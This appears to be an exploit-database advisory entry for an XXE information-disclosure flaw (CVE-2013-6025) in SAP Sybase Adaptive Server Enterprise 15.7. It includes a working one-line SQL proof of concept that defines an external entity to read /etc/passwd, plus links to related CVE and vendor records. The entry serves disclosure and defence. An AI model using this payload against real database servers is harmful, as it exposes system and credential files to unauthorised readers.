Lucene search
Igor Bulatenko1337DAY-ID-24606HistoryNov 25, 2015 - 12:00 a.m.
SAP Sybase Adaptive Server Enterprise XML External Entity Information Disclosure Vulnerability
2015-11-2500:00:00
Igor Bulatenko
0day.today
26
0.032 Low
EPSS
Percentile
91.3%
SAP Sybase Adaptive Server Enterprise suffers from an XXE injection vulnerability.
source: http://www.securityfocus.com/bid/63193/info
SAP Sybase Adaptive Server Enterprise is prone to an information-disclosure vulnerability.
An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.
SAP Sybase Adaptive Server Enterprise 15.7 ESD 2 is vulnerable; other versions may also be affected.
SELECT xmlextract('/', xmlparse('<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/etc/passwd">]><content>&abc;</content>'))
# 0day.today [2018-02-06] #Related
nvd
nvd
CVE-2013-6025
2013-10-19 10:36:08
packetstorm
packetstorm
SAP Sybase Adapter Server Enterprise XXE Injection
2015-11-25 00:00:00
cert
cert
SAP Sybase Adaptive Server Enterprise vulnerable to XML injection
2013-10-17 00:00:00
nessus
nessus
prion
prion
Xxe
2013-10-19 10:36:00
cve
cve
CVE-2013-6025
2013-10-19 10:36:08
cvelist
cvelist
CVE-2013-6025
2013-10-19 10:00:00
ptsecurity
ptsecurity
PT-2012-61: XML External Entities Injection in SAP Sybase ASE
2013-10-24 00:00:00